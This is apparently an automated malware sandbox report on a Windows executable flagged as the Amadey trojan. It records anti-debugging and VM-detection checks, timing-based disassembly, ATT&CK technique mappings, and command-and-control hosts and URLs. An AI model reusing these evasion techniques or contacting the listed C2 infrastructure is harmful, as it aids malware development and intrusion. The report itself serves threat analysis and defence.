Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D700A5 second address: 6D700AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D700AB second address: 6D70112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F8E2D68FC60h 0x00000010 and esp, FFFFFFF0h 0x00000013 pushad 0x00000014 jmp 00007F8E2D68FC5Eh 0x00000019 pushfd 0x0000001a jmp 00007F8E2D68FC62h 0x0000001f and cx, F108h 0x00000024 jmp 00007F8E2D68FC5Bh 0x00000029 popfd 0x0000002a popad 0x0000002b sub esp, 44h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov si, bx 0x00000034 mov dx, A702h 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70112 second address: 6D70167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 call 00007F8E2D690EF2h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F8E2D690EF3h 0x00000019 add ch, 0000005Eh 0x0000001c jmp 00007F8E2D690EF9h 0x00000021 popfd 0x00000022 mov dx, ax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70167 second address: 6D70183 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC68h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70183 second address: 6D70187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70187 second address: 6D701D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F8E2D68FC68h 0x00000014 sub si, FCE8h 0x00000019 jmp 00007F8E2D68FC5Bh 0x0000001e popfd 0x0000001f call 00007F8E2D68FC68h 0x00000024 pop ecx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D701D9 second address: 6D70212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F8E2D690EF4h 0x0000000e mov dword ptr [esp], esi 0x00000011 jmp 00007F8E2D690EF0h 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov eax, ebx 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D70212 second address: 6D702B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edi 0x0000000c mov di, si 0x0000000f pop eax 0x00000010 push edx 0x00000011 mov ax, 858Bh 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 jmp 00007F8E2D68FC67h 0x0000001d mov edi, dword ptr [ebp+08h] 0x00000020 pushad 0x00000021 push edx 0x00000022 mov ecx, 2B7F5E9Dh 0x00000027 pop esi 0x00000028 popad 0x00000029 mov dword ptr [esp+24h], 00000000h 0x00000031 jmp 00007F8E2D68FC69h 0x00000036 lock bts dword ptr [edi], 00000000h 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov esi, edx 0x00000040 pushfd 0x00000041 jmp 00007F8E2D68FC5Fh 0x00000046 and ah, 0000006Eh 0x00000049 jmp 00007F8E2D68FC69h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D702B5 second address: 6D702F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F8E9DC7304Fh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F8E2D690EECh 0x00000016 add cx, 0318h 0x0000001b jmp 00007F8E2D690EEBh 0x00000020 popfd 0x00000021 movzx eax, bx 0x00000024 popad 0x00000025 pop edi 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D702F9 second address: 6D702FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D702FD second address: 6D7036E instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, dx 0x0000000a popad 0x0000000b pop esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F8E2D690EF7h 0x00000013 adc eax, 082F453Eh 0x00000019 jmp 00007F8E2D690EF9h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F8E2D690EF0h 0x00000025 xor cl, 00000038h 0x00000028 jmp 00007F8E2D690EEBh 0x0000002d popfd 0x0000002e popad 0x0000002f pop ebx 0x00000030 pushad 0x00000031 mov ax, C48Bh 0x00000035 push eax 0x00000036 push edx 0x00000037 mov di, ax 0x0000003a rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D7036E second address: 6D7038D instructions: 0x00000000 rdtsc 0x00000002 mov ax, AFB9h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, bx 0x00000011 jmp 00007F8E2D68FC5Dh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D7038D second address: 6D7039D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D690EECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6D7039D second address: 6D703A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0910 second address: 6DA0920 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 59C6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0920 second address: 6DA0939 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0939 second address: 6DA0991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 pushfd 0x00000006 jmp 00007F8E2D690EF3h 0x0000000b add ax, 25AEh 0x00000010 jmp 00007F8E2D690EF9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F8E2D690EF8h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0991 second address: 6DA0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0995 second address: 6DA099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA099B second address: 6DA09AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E2D68FC5Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA09AC second address: 6DA09B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0BE5 second address: 6DA0C0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 mov ax, bx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f jmp 00007F8E2D68FC5Dh 0x00000014 push dword ptr [ebp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0C0A second address: 6DA0C10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6DA0C10 second address: 6DA0C16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E10B2A second address: 6E10B2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E10B2E second address: 6E10B6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F8E2D68FC69h 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushfd 0x00000012 jmp 00007F8E2D68FC5Ah 0x00000017 sbb si, D6E8h 0x0000001c jmp 00007F8E2D68FC5Bh 0x00000021 popfd 0x00000022 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E10B6F second address: 6E10BDB instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8E2D690EF8h 0x00000008 and ax, E948h 0x0000000d jmp 00007F8E2D690EEBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov bh, cl 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov dh, 20h 0x0000001d mov ebx, ecx 0x0000001f popad 0x00000020 mov dl, byte ptr [ebp+14h] 0x00000023 jmp 00007F8E2D690EF4h 0x00000028 mov eax, dword ptr [ebp+10h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F8E2D690EF7h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E10BDB second address: 6E10C54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8E2D68FC5Fh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F8E2D68FC69h 0x0000000f jmp 00007F8E2D68FC5Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 and dl, 00000007h 0x0000001b jmp 00007F8E2D68FC66h 0x00000020 test eax, eax 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F8E2D68FC5Ch 0x00000029 mov edi, esi 0x0000002b popad 0x0000002c mov di, si 0x0000002f popad 0x00000030 je 00007F8E9DBF5201h 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 movsx edi, ax 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E0046E second address: 6E00473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E00473 second address: 6E0049D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8E2D68FC64h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E0049D second address: 6E004A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E004A3 second address: 6E004F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D68FC5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F8E2D68FC5Eh 0x00000011 mov ebp, esp 0x00000013 jmp 00007F8E2D68FC60h 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F8E2D68FC60h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E004F1 second address: 6E00527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E2D690EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F8E2D690EF3h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E00527 second address: 6E0052C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: 6E0052C second address: 6E00532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Special instruction interceptor: First address: D8DC85 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Special instruction interceptor: First address: D8DB8C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Special instruction interceptor: First address: D8B20E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Special instruction interceptor: First address: FBFC65 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Window / User API: threadDelayed 1812
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Window / User API: threadDelayed 954
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Window / User API: threadDelayed 931
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 2976 | Thread sleep time: -110055s >= -30000s
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 280 | Thread sleep time: -116058s >= -30000s
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 1444 | Thread sleep time: -3625812s >= -30000s
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 2876 | Thread sleep time: -1908954s >= -30000s
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe TID: 992 | Thread sleep time: -1862931s >= -30000s
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | File Volume queried: C:\ FullSizeInformation
Source: S0O8qbVwLk.exe, S0O8qbVwLk.exe, 00000000.00000002.2953801000.0000000000F16000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: S0O8qbVwLk.exe | Binary or memory string: Hyper-V RAW
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: S0O8qbVwLk.exe, 00000000.00000002.2953801000.0000000000F16000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: S0O8qbVwLk.exe, 00000000.00000003.2949226344.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949064428.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2948769870.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2678930752.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949584945.00000000013E7000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2956104477.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2926759037.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2948933338.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949494327.00000000013E3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | File opened: NTICE
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | File opened: SICE
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Process queried: DebugPort
Source: S0O8qbVwLk.exe, S0O8qbVwLk.exe, 00000000.00000002.2953801000.0000000000F16000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ~Program Manager
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\S0O8qbVwLk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: procmon.exe
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic TCP traffic: 192.168.2.6:49717 -> 147.45.113.159:80
Source: global traffic TCP traffic: 192.168.2.6:49725 -> 147.45.113.159:80
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 741 Security Software Discovery | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 12 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 214 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label
S0O8qbVwLk.exe | 66% | ReversingLabs | Win32.Trojan.Amadey
S0O8qbVwLk.exe | 100% | Avira | TR/Crypt.TPM.Gen
S0O8qbVwLk.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.twentytk20pn.top | 147.45.113.159 | true | false | | high
httpbin.org | 98.85.100.80 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322 | false | | high
https://httpbin.org/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322se | S0O8qbVwLk.exe, 00000000.00000003.2950368067.0000000001377000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2955647121.0000000001379000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://html4/loose.dtd | S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WE | S0O8qbVwLk.exe, 00000000.00000003.2926759037.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2948933338.00000000013D5000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2949494327.00000000013E3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
https://httpbin.org/ipbefore | S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html | S0O8qbVwLk.exe, S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html | S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322 | S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322::3 | S0O8qbVwLk.exe, 00000000.00000003.2950368067.0000000001377000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2955647121.0000000001379000.00000004.00000020.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000003.2950243697.0000000001372000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://.jpg | S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322http://home.twentytk20pn.top/WEIsmPfDcpBF | S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
98.85.100.80 | httpbin.org | United States | 11351 | TWC-11351-NORTHEASTUS | false
147.45.113.159 | home.twentytk20pn.top | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | false
                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578955
                                  Start date and time:2024-12-20 17:04:06 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 6m 24s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:4
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
